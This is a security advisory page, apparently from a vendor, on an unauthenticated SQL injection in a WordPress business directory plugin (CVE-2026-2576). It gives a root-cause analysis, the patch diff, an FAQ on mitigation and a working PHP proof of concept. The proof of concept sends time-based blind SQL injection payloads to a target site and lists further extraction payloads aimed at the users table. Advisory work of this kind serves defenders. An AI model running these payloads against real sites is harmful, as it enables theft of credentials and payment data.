What is CVE-2026-2576?

CVE-2026-2576 is a high severity SQL injection vulnerability found in the Business Directory Plugin for WordPress, affecting versions up to and including 6.4.21. It allows unauthenticated attackers to inject arbitrary SQL commands via the ‘payment’ parameter, potentially leading to unauthorized access to sensitive database information.

How does the SQL injection work?

The vulnerability arises from insufficient sanitization of the ‘payment’ parameter in the checkout page controller. Attackers can manipulate this parameter to append malicious SQL queries, allowing them to extract data from the database without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Business Directory Plugin version 6.4.21 or earlier is at risk. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Business Directory Plugin installed. If it is version 6.4.21 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-2576?

To mitigate this vulnerability, update the Business Directory Plugin to version 6.4.22 or later, where the issue has been patched. Ensure that all plugins are regularly updated to protect against known vulnerabilities.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, including unauthorized access to sensitive data, which poses a serious risk to the integrity and confidentiality of the affected system.

What are the practical risks of this vulnerability?

If exploited, attackers could execute arbitrary SQL queries on the WordPress database, potentially leading to the compromise of sensitive information such as user credentials and payment details. This could also allow for privilege escalation and unauthorized modifications to the site.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates the vulnerability by sending a specially crafted HTTP request to the checkout endpoint with a malicious payload. This payload utilizes a time-based SQL injection technique to confirm the vulnerability by causing the database to delay its response.

What steps should I take if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Business Directory Plugin temporarily to prevent exploitation. Additionally, monitor your site for unusual activity and implement web application firewalls to help block malicious requests.

Are there any other security measures I should consider?

In addition to updating vulnerable plugins, maintain regular backups of your site, use strong passwords, and implement security plugins that monitor for vulnerabilities and provide additional layers of protection.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately take the site offline, investigate the extent of the breach, and restore from a clean backup. Consult with security professionals if necessary to assess and remediate the situation.

Where can I find more information about this vulnerability?

More information about CVE-2026-2576 can be found on the official CVE database, security advisories from the plugin developers, and various cybersecurity blogs that analyze vulnerabilities and their implications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2576: Business Directory Plugin <= 6.4.21 – Unauthenticated SQL Injection via payment Parameter (business-directory-plugin)

CVE ID CVE-2026-2576

Plugin business-directory-plugin

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 6.4.21

Patched Version 6.4.22

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2576:
The Business Directory Plugin for WordPress versions up to and including 6.4.21 contains an unauthenticated SQL injection vulnerability. This flaw exists in the checkout page controller and allows attackers to inject arbitrary SQL commands via the ‘payment’ parameter. The vulnerability has a CVSS score of 7.5, indicating a high severity issue.

Root Cause:
The vulnerability originates in the `fetch_payment()` method within the `class-checkout.php` controller file. The function retrieves the ‘payment’ parameter from the request using `wpbdp_get_var()` without proper sanitization. In version 6.4.21, line 128 passes the raw user input directly to the `WPBDP_Payment::objects()->get()` method as the `payment_key` value. This user-controlled value is then incorporated into an SQL query without adequate escaping or prepared statement usage, creating a classic SQL injection vector.

Exploitation:
Attackers can exploit this vulnerability by sending HTTP requests to any page that loads the checkout controller, typically accessible via `/checkout/` or similar plugin routes. The attack requires only a single GET or POST parameter: `payment=[SQL injection payload]`. Attackers can use time-based blind SQL injection techniques with payloads like `payment=1′ AND SLEEP(5)–` to extract sensitive database information, including user credentials, payment details, and listing data.

Patch Analysis:
The patch in version 6.4.22 adds input validation and sanitization to the vulnerable code path. Line 129 now includes a type check: `if ( ! is_string( $payment_id ) ) { wp_die( __( ‘Invalid Payment ID/key’, ‘business-directory-plugin’ ) ); }`. More critically, line 132 now wraps the user input with `sanitize_text_field()` before passing it to the query: `’payment_key’ => sanitize_text_field( $payment_id )`. This sanitization function removes potentially dangerous characters and ensures the parameter is treated as a string, effectively neutralizing SQL injection attempts.

Impact:
Successful exploitation enables unauthenticated attackers to execute arbitrary SQL queries on the WordPress database. This can lead to complete database compromise, including extraction of administrator credentials, sensitive payment information, personally identifiable information from directory listings, and potentially privilege escalation through user registration or modification. The time-based nature of the injection allows attackers to exfiltrate data character by character without triggering immediate detection.

Differential between vulnerable and patched code

Code Diff

--- a/business-directory-plugin/business-directory-plugin.php
+++ b/business-directory-plugin/business-directory-plugin.php
@@ -3,7 +3,7 @@
  * Plugin Name: Business Directory Plugin
  * Plugin URI: https://businessdirectoryplugin.com
  * Description: Provides the ability to maintain a free or paid business directory on your WordPress powered site.
- * Version: 6.4.21
+ * Version: 6.4.22
  * Author: Business Directory Team
  * Author URI: https://businessdirectoryplugin.com
  * Text Domain: business-directory-plugin
--- a/business-directory-plugin/includes/class-wpbdp.php
+++ b/business-directory-plugin/includes/class-wpbdp.php
@@ -55,7 +55,7 @@
 	}

 	private function setup_constants() {
-		define( 'WPBDP_VERSION', '6.4.21' );
+		define( 'WPBDP_VERSION', '6.4.22' );

 		define( 'WPBDP_PATH', wp_normalize_path( plugin_dir_path( WPBDP_PLUGIN_FILE ) ) );
 		define( 'WPBDP_INC', trailingslashit( WPBDP_PATH . 'includes' ) );
--- a/business-directory-plugin/includes/compatibility/class-cpt-compat-mode.php
+++ b/business-directory-plugin/includes/compatibility/class-cpt-compat-mode.php
@@ -11,6 +11,7 @@
 		add_filter( 'wpbdp_current_view', array( $this, 'maybe_change_current_view' ) );
 		add_action( 'wpbdp_before_dispatch', array( $this, 'before_dispatch' ) );
 		add_action( 'wpbdp_after_dispatch', array( $this, 'after_dispatch' ) );
+		add_action( 'admin_bar_menu', array( $this, 'update_admin_bar_edit_link' ), 90 );
 	}

 	public function maybe_change_current_view( $viewname ) {
@@ -50,6 +51,44 @@
 		return wpbdp_get_post_by_id_or_slug( $id_or_slug, 'id', 'id' );
 	}

+	/**
+	 * Update the admin bar edit link to point to the listing.
+	 *
+	 * @since 6.4.22
+	 *
+	 * @param WP_Admin_Bar $wp_admin_bar The WP_Admin_Bar instance.
+	 *
+	 * @return void
+	 */
+	public function update_admin_bar_edit_link( $wp_admin_bar ) {
+		if ( is_admin() || ! is_admin_bar_showing() ) {
+			return;
+		}
+
+		if ( 'show_listing' !== wpbdp_current_view() ) {
+			return;
+		}
+
+		$listing_id = $this->get_listing_id_from_query_var();
+		if ( ! $listing_id || ! current_user_can( 'edit_post', $listing_id ) ) {
+			return;
+		}
+
+		$edit_link = get_edit_post_link( $listing_id );
+		if ( ! $edit_link ) {
+			return;
+		}
+
+		$node = $wp_admin_bar->get_node( 'edit' );
+		if ( ! $node ) {
+			return;
+		}
+
+		$node->href  = $edit_link;
+		$node->title = esc_html__( 'Edit Listing', 'business-directory-plugin' );
+		$wp_admin_bar->add_node( $node );
+	}
+
 	public function before_dispatch() {
 		global $wp_query;

--- a/business-directory-plugin/includes/controllers/pages/class-checkout.php
+++ b/business-directory-plugin/includes/controllers/pages/class-checkout.php
@@ -125,14 +125,19 @@

 	private function fetch_payment() {
 		$payment_id = wpbdp_get_var( array( 'param' => 'payment' ), 'request' );
+
+		if ( ! is_string( $payment_id ) ) {
+			wp_die( __( 'Invalid Payment ID/key', 'business-directory-plugin' ) );
+		}
+
 		if ( ! $this->payment_id && ! empty( $payment_id ) ) {
-			$this->payment = WPBDP_Payment::objects()->get( array( 'payment_key' => $payment_id ) );
+			$this->payment = WPBDP_Payment::objects()->get( array( 'payment_key' => sanitize_text_field( $payment_id ) ) );
 		} elseif ( $this->payment_id ) {
 			$this->payment = WPBDP_Payment::objects()->get( $this->payment_id );
 		}

 		if ( ! $this->payment ) {
-			wp_die( 'Invalid Payment ID/key' );
+			wp_die( __( 'Invalid Payment ID/key', 'business-directory-plugin' ) );
 		}

 		$this->payment_id = $this->payment->id;
--- a/business-directory-plugin/includes/db/class-db-query-set.php
+++ b/business-directory-plugin/includes/db/class-db-query-set.php
@@ -207,7 +207,13 @@
 			}

 			if ( is_array( $v ) ) {
-				$filters[] = "$f IN ('" . implode( '','', $v ) . "')";
+				if ( empty( $v ) ) {
+					$filters[] = '1 = 0';
+				} else {
+					$placeholders = implode( ', ', array_fill( 0, count( $v ), '%s' ) );
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $f is a trusted column name.
+					$filters[] = $this->db->prepare( "$f IN ($placeholders)", ...array_values( $v ) );
+				}
 			} else {
 				$filters[] = $this->db->prepare( "$f $op %s", $v );
 			}
--- a/business-directory-plugin/includes/gateways/class-stripe-gateway.php
+++ b/business-directory-plugin/includes/gateways/class-stripe-gateway.php
@@ -422,6 +422,13 @@
 					'quantity'    => 1,
 				),
 			);
+
+			// Include payment ID in payment intent metadata for retry handling.
+			$parameters['payment_intent_data'] = array(
+				'metadata' => array(
+					'wpbdp_payment_id' => $payment->id,
+				),
+			);
 		}

 		return $parameters;
--- a/business-directory-plugin/includes/gateways/stripe/controllers/classStrpEventsController.php
+++ b/business-directory-plugin/includes/gateways/stripe/controllers/classStrpEventsController.php
@@ -190,13 +190,7 @@

 		switch ( $this->event->type ) {
 			case 'invoice.payment_failed':
-				if ( $parent_payment && 'stripe' === $parent_payment->gateway ) {
-					$cancel = WPBDPStrpConnectHelper::cancel_subscription( $subscription->get_subscription_id() );
-					if ( $cancel ) {
-						// Mark as canceled in BD.
-						$subscription->cancel();
-					}
-				}
+				$this->process_invoice_payment_failed( $subscription, $parent_payment );
 				break;
 			case 'invoice.payment_succeeded':
 				if ( ! $subscription ) {
@@ -217,6 +211,35 @@
 	}

 	/**
+	 * Handle invoice.payment_failed events.
+	 *
+	 * @since 6.4.22
+	 *
+	 * @param WPBDP__Listing_Subscription|null $subscription   The subscription object.
+	 * @param object|null                      $parent_payment The parent payment object.
+	 *
+	 * @return void
+	 */
+	private function process_invoice_payment_failed( $subscription, $parent_payment ) {
+		if ( ! $parent_payment || 'stripe' !== $parent_payment->gateway ) {
+			return;
+		}
+
+		// Soft cancel: Mark listing as expired but preserve subscription data for potential recovery.
+		$listing = wpbdp_get_listing( $parent_payment->listing_id );
+
+		if ( ! $listing ) {
+			return;
+		}
+
+		$listing->set_status( 'expired' );
+		$listing->set_post_status( 'draft' );
+
+		// Store metadata to track this was a payment failure (for recovery on successful retry).
+		update_post_meta( $parent_payment->listing_id, '_wpbdp_stripe_payment_failed', time() );
+	}
+
+	/**
 	 * @return object|null
 	 */
 	private function maybe_create_listing_subscription() {
@@ -267,20 +290,11 @@
 	 * @return void
 	 */
 	private function process_payment_intent() {
-		$event = $this->event->data;
-
 		if ( empty( $this->invoice->id ) || 'manual' === $this->invoice->confirmation_method ) {
 			return;
 		}

-		$checkout = $this->verify_transaction();
-		if ( ! $checkout ) {
-			return;
-		}
-
-		$checkout = array_shift( $checkout );
-		$payment  = wpbdp_get_payment( $checkout->data->object->client_reference_id );
-
+		$payment = $this->find_payment_for_intent();
 		if ( ! $payment || 'completed' === $payment->status ) {
 			return;
 		}
@@ -299,6 +313,29 @@
 		}

 		$payment->save();
+		$this->maybe_reactivate_listing( $payment->listing_id );
+	}
+
+	/**
+	 * Find the WPBDP payment associated with a payment intent.
+	 *
+	 * @since 6.4.22
+	 *
+	 * @return WPBDP_Payment|null The payment object if found, null otherwise.
+	 */
+	private function find_payment_for_intent() {
+		$checkout = $this->verify_transaction();
+		if ( $checkout ) {
+			$checkout = array_shift( $checkout );
+			return wpbdp_get_payment( $checkout->data->object->client_reference_id );
+		}
+
+		// Fallback: Check if payment intent has metadata with payment ID.
+		if ( ! empty( $this->invoice->metadata->wpbdp_payment_id ) ) {
+			return wpbdp_get_payment( $this->invoice->metadata->wpbdp_payment_id );
+		}
+
+		return null;
 	}

 	/**
@@ -380,6 +417,8 @@
 			$parent_payment->gateway_tx_id = $invoice->charge;
 			$parent_payment->gateway       = 'stripe';
 			$parent_payment->save();
+
+			$this->maybe_reactivate_listing( $parent_payment->listing_id );
 			return;
 		}

@@ -402,5 +441,32 @@
 			)
 		);
 		$subscription->renew();
+		$this->maybe_reactivate_listing( $parent_payment->listing_id );
+	}
+
+	/**
+	 * Reactivate a listing if it was previously marked as failed.
+	 *
+	 * @since 6.4.22
+	 *
+	 * @param int $listing_id The listing ID to check and potentially reactivate.
+	 *
+	 * @return void
+	 */
+	private function maybe_reactivate_listing( $listing_id ) {
+		$failed_timestamp = get_post_meta( $listing_id, '_wpbdp_stripe_payment_failed', true );
+		if ( ! $failed_timestamp ) {
+			return;
+		}
+
+		$listing = wpbdp_get_listing( $listing_id );
+		if ( ! $listing ) {
+			return;
+		}
+
+		$listing->set_status( 'complete' );
+		$listing->set_post_status( 'publish' );
+
+		delete_post_meta( $listing_id, '_wpbdp_stripe_payment_failed' );
 	}
 }
--- a/business-directory-plugin/includes/helpers/class-email.php
+++ b/business-directory-plugin/includes/helpers/class-email.php
@@ -138,11 +138,14 @@
 			return false;
 		}
 		if ( $this->template ) {
+			$prepared_body = str_ireplace( array( '<br>', '<br/>', '<br />' ), "n", $this->body );
+			$prepared_body = nl2br( $prepared_body );
+
 			if ( $html_ = wpbdp_render(
 				$this->template,
 				array(
 					'subject' => $this->subject,
-					'body'    => $this->body,
+					'body'    => $prepared_body,
 				)
 			) ) {
 				$this->html = $html_;
--- a/business-directory-plugin/includes/helpers/functions/general.php
+++ b/business-directory-plugin/includes/helpers/functions/general.php
@@ -979,6 +979,10 @@
 	return wpbdp_url( sprintf( '/%s/%s/', wpbdp_get_option( 'permalinks-' . $taxonomy_type . '-slug' ), $taxonomy->slug ) );
 }

+/**
+ * Use this when the template should not be overridden, or it has already
+ * gone through the override check.
+ */
 function wpbdp_render_page( $template, $vars = array(), $echo_output = false ) {
 	if ( empty( $template ) ) {
 		return '';
@@ -1003,62 +1007,73 @@
 	return $html;
 }

-function wpbdp_locate_template( $template, $allow_override = true, $try_defaults = true ) {
+/**
+ * Also used to get taxonomy template when WPBDP is not using CPT.
+ *
+ * @uses WPBDP_Themes::locate_template()
+ *
+ * @used-by wpbdp_render()
+ */
+function wpbdp_locate_template( $template, $allow_override = true ) {
 	$template_file = '';

 	if ( ! is_array( $template ) ) {
 		$template = array( $template );
 	}

-	if ( $allow_override ) {
-		global $wpbdp;
-
-		$search_for    = array();
-		$template_file = '';
-
+	if ( ! $allow_override ) {
+		// Only get the core file if it hasn't already been checked.
 		foreach ( $template as $t ) {
-			$template_file = $wpbdp->themes->locate_template( $t );
-			if ( $template_file ) {
-				break;
-			}
+			$template_path = WPBDP_TEMPLATES_PATH . '/' . $t . '.tpl.php';

-			// These file checks could be a little risky and get unintended results.
-			if ( wpbdp_get_option( 'disable-cpt' ) ) {
-				$search_for[] = $t . '.tpl.php';
-				$search_for[] = $t . '.php';
-				$search_for[] = 'single/' . $t . '.tpl.php';
-				$search_for[] = 'single/' . $t . '.php';
+			if ( file_exists( $template_path ) ) {
+				$template_file = $template_path;
+				break;
 			}
 		}
-
-		// Check for the template in the WP theme.
-		if ( empty( $template_file ) ) {
-			$template_file = locate_template( $search_for );
-		}
+		return $template_file;
 	}

-	if ( $template_file && ! $try_defaults ) {
-		_deprecated_argument( __FUNCTION__, '5.13.2', 'Defaults are always checked here. Use $wpbdp->themes->template_has_override' );
+	global $wpbdp;

-		// Temporary reverse compatibility: The BD folder was checked when it shouldn't be. Remove it.
-		if ( strpos( $template_file, WPBDP_TEMPLATES_PATH ) !== false ) {
-			$template_file = '';
+	$search_for    = array();
+	$template_file = '';
+
+	foreach ( $template as $t ) {
+		$template_file = $wpbdp->themes->locate_template( $t );
+		if ( $template_file ) {
+			break;
 		}
-	} elseif ( ! $allow_override ) {
-		// Only get the core file if it hasn't already been checked.
-		foreach ( $template as $t ) {
-			$template_path = WPBDP_TEMPLATES_PATH . '/' . $t . '.tpl.php';

-			if ( file_exists( $template_path ) ) {
-				$template_file = $template_path;
-				break;
-			}
+		// These file checks could be a little risky and get unintended results.
+		if ( wpbdp_get_option( 'disable-cpt' ) ) {
+			$search_for[] = $t . '.tpl.php';
+			$search_for[] = $t . '.php';
+			$search_for[] = 'single/' . $t . '.tpl.php';
+			$search_for[] = 'single/' . $t . '.php';
+		}
+	}
+
+	// Check for the template in the WP theme when CPT is disabled.
+	if ( empty( $template_file ) ) {
+		$template_file = locate_template( $search_for );
+		if ( $template_file ) {
+			$expected = 'business-directory/' . str_replace( ' ', '-', $template[0] ) . '.tpl.php';
+			_deprecated_argument(
+				__FUNCTION__,
+				'6.4',
+				'This template will not be used in a future release: ' . $template_file .
+				'. Please use the template file ' . $expected . ' instead.'
+			);
 		}
 	}

 	return $template_file;
 }

+/**
+ * @uses wpbdp_render_page()
+ */
 function wpbdp_render( $template, $vars = array(), $allow_override = true ) {
 	$vars          = wp_parse_args(
 		$vars,
--- a/business-directory-plugin/includes/themes.php
+++ b/business-directory-plugin/includes/themes.php
@@ -55,7 +55,9 @@
 	 * @since 5.13.2
 	 */
 	private function set_template_dirs() {
-		// Theme BD template dir is priority 1.
+		$this->add_wp_theme_dir();
+
+		// Theme BD template dir is priority 2.
 		$theme                     = $this->get_active_theme_data();
 		$this->template_dirs['bd'] = $theme->path . 'templates/';

@@ -63,6 +65,29 @@
 	}

 	/**
+	 * Get the paths from locate_template() in WordPress core.
+	 *
+	 * @since 6.4.22
+	 *
+	 * @return void
+	 */
+	private function add_wp_theme_dir() {
+		$stylesheet_path = get_stylesheet_directory();
+		$template_path   = get_template_directory();
+		$is_child_theme  = $stylesheet_path !== $template_path;
+
+		$bd_folder = '/business-directory/';
+
+		// WP theme template dir is priority 1.
+		$this->template_dirs['wp'] = $stylesheet_path . $bd_folder;
+
+		if ( $is_child_theme ) {
+			// Check the parent theme.
+			$this->template_dirs['wp-parent'] = $template_path . $bd_folder;
+		}
+	}
+
+	/**
 	 * @since 5.13.2
 	 */
 	private function add_core_template_dir() {
@@ -583,16 +608,8 @@
 		}

 		array_push( $this->cache['template_vars_stack'], $vars );
-		extract( $vars );
-
-		ob_start();
-		include $path;
-		$html = ob_get_contents();
-		ob_end_clean();

-		if ( isset( $__template__['blocks'] ) && is_array( $__template__['blocks'] ) ) {
-			$template_meta['blocks'] = array_merge( $__template__['blocks'], $template_meta['blocks'] );
-		}
+		$html = wpbdp_render_page( $path, $vars );

 		$is_part = isset( $vars['_part'] ) && $vars['_part'];

@@ -826,6 +843,17 @@
 		}
 	}

+	/**
+	 * Find the template file in the theme, core, or custom location.
+	 *
+	 * @used-by wpbdp_render()
+	 * @used-by wpbdp_x_render()
+	 * @used-by wpbdp_x_part()
+	 *
+	 * @param string $id Template name.
+	 *
+	 * @return bool|string Path to template file or false if not found.
+	 */
 	public function locate_template( $id ) {
 		$id = str_replace( '.tpl.php', '', $id );

@@ -834,24 +862,26 @@
 		}

 		$filename = str_replace( ' ', '-', $id ) . '.tpl.php';
-		$path     = locate_template( 'business-directory/' . $filename );
+		$path     = false;

 		// Find the template.
 		foreach ( $this->template_dirs as $p ) {
-			if ( empty( $path ) && file_exists( $p . $filename ) ) {
+			if ( file_exists( $p . $filename ) ) {
 				$path = $p . $filename;
 			}

+			if ( empty( $path ) ) {
+				continue;
+			}
+
+			/**
+			 * Allow override since the order isn't the most dependable indicator.
+			 *
+			 * @since 5.9.2
+			 */
+			$path = apply_filters( 'wpbdp_use_template_' . $id, $path );
 			if ( $path ) {
-				/**
-				 * Allow override since the order isn't the most dependable indicator.
-				 *
-				 * @since 5.9.2
-				 */
-				$path = apply_filters( 'wpbdp_use_template_' . $id, $path );
-				if ( $path ) {
-					break;
-				}
+				break;
 			}
 		}

--- a/business-directory-plugin/templates/excerpt.tpl.php
+++ b/business-directory-plugin/templates/excerpt.tpl.php
@@ -2,10 +2,10 @@
 /**
  * Template listing excerpt view.
  *
+ * Template Blocks: before, after
+ *
  * @package BDP/Templates/Excerpt
  */
-
-$__template__ = array( 'blocks' => array( 'before', 'after' ) );
 ?>
 <div id="<?php echo esc_attr( $listing_css_id ); ?>" class="<?php echo esc_attr( $listing_css_class ); ?>" data-breakpoints='{"medium": [560,780], "large": [780,999999]}' data-breakpoints-class-prefix="wpbdp-listing-excerpt">
 	<?php

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2576 - Business Directory Plugin <= 6.4.21 - Unauthenticated SQL Injection via payment Parameter

<?php
/**
 * Proof of Concept for CVE-2026-2576
 * Unauthenticated SQL Injection in Business Directory Plugin <= 6.4.21
 *
 * Usage: php poc.php http://target-wordpress-site.com
 */

$target_url = isset($argv[1]) ? rtrim($argv[1], '/') : 'http://localhost';

// The plugin's checkout endpoint (common path)
$checkout_endpoint = '/checkout/';

// Time-based SQL injection payload
// Tests if the database sleeps for 5 seconds, confirming vulnerability
$payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- ";

// Construct the full URL with malicious parameter
$attack_url = $target_url . $checkout_endpoint . '?payment=' . urlencode($payload);

echo "[+] Target: $target_urln";
echo "[+] Testing endpoint: $checkout_endpointn";
echo "[+] Sending payload: $payloadn";
echo "[+] Full URL: $attack_urlnn";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Set timeout slightly higher than sleep duration

// Measure response time
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);

$response_time = $end_time - $start_time;
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

echo "[+] Response Time: " . round($response_time, 2) . " secondsn";
echo "[+] HTTP Status: $http_coden";

// Check if vulnerable (response time > 5 seconds)
if ($response_time >= 5) {
    echo "[!] VULNERABLE: Server delayed response indicates successful SQL injectionn";
    echo "[!] Confirms CVE-2026-2576 is exploitablen";
    
    // Demonstrate data extraction potential
    echo "n[+] Example extraction payloads:n";
    echo "    Extract database user: payment=1' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)-- n";
    echo "    Extract table names: payment=1' AND IF(EXISTS(SELECT 1 FROM information_schema.tables),SLEEP(5),0)-- n";
    echo "    Extract wp_users: payment=1' AND IF(EXISTS(SELECT 1 FROM wp_users),SLEEP(5),0)-- n";
} else {
    echo "[-] NOT VULNERABLE: Normal response time or patched versionn";
}

?>

Frequently Asked Questions

What is CVE-2026-2576?
Overview of the vulnerability
CVE-2026-2576 is a high severity SQL injection vulnerability found in the Business Directory Plugin for WordPress, affecting versions up to and including 6.4.21. It allows unauthenticated attackers to inject arbitrary SQL commands via the ‘payment’ parameter, potentially leading to unauthorized access to sensitive database information.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient sanitization of the ‘payment’ parameter in the checkout page controller. Attackers can manipulate this parameter to append malicious SQL queries, allowing them to extract data from the database without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Business Directory Plugin version 6.4.21 or earlier is at risk. Administrators should check their plugin version and update if necessary to ensure they are not vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Business Directory Plugin installed. If it is version 6.4.21 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-2576?
Recommended actions
To mitigate this vulnerability, update the Business Directory Plugin to version 6.4.22 or later, where the issue has been patched. Ensure that all plugins are regularly updated to protect against known vulnerabilities.
What does a CVSS score of 7.5 indicate?
Understanding severity levels
A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, including unauthorized access to sensitive data, which poses a serious risk to the integrity and confidentiality of the affected system.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
If exploited, attackers could execute arbitrary SQL queries on the WordPress database, potentially leading to the compromise of sensitive information such as user credentials and payment details. This could also allow for privilege escalation and unauthorized modifications to the site.
What is the proof of concept for this vulnerability?
Demonstration of the issue
The proof of concept demonstrates the vulnerability by sending a specially crafted HTTP request to the checkout endpoint with a malicious payload. This payload utilizes a time-based SQL injection technique to confirm the vulnerability by causing the database to delay its response.
What steps should I take if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Business Directory Plugin temporarily to prevent exploitation. Additionally, monitor your site for unusual activity and implement web application firewalls to help block malicious requests.
Are there any other security measures I should consider?
Enhancing overall security
In addition to updating vulnerable plugins, maintain regular backups of your site, use strong passwords, and implement security plugins that monitor for vulnerabilities and provide additional layers of protection.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect that your site has been compromised due to this vulnerability, immediately take the site offline, investigate the extent of the breach, and restore from a clean backup. Consult with security professionals if necessary to assess and remediate the situation.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-2576 can be found on the official CVE database, security advisories from the plugin developers, and various cybersecurity blogs that analyze vulnerabilities and their implications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations